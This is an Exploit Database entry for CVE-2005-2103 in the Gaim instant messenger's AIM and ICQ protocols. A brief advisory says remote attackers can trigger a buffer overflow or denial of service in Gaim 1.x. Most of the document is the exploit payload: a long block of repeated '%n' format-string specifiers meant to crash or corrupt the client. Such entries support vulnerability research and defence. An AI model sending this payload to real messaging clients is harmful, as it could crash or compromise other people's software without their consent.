ad

Gaim AIM/ICQ Protocols Multiple Vulnerabilities



EDB-ID: 26139 CVE: 2005-2103 OSVDB-ID: 18669
Author: Brandon Perry Published: 2005-08-10 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
source: http://www.securityfocus.com/bid/14531/info

Gaim is prone to multiple vulnerabilities affecting the AIM and ICQ protocols. These issues may allow remote attackers to trigger a buffer overflow or a denial-of-service condition.

All versions of Gaim 1.x are considered vulnerable at the moment. 

%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n
%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n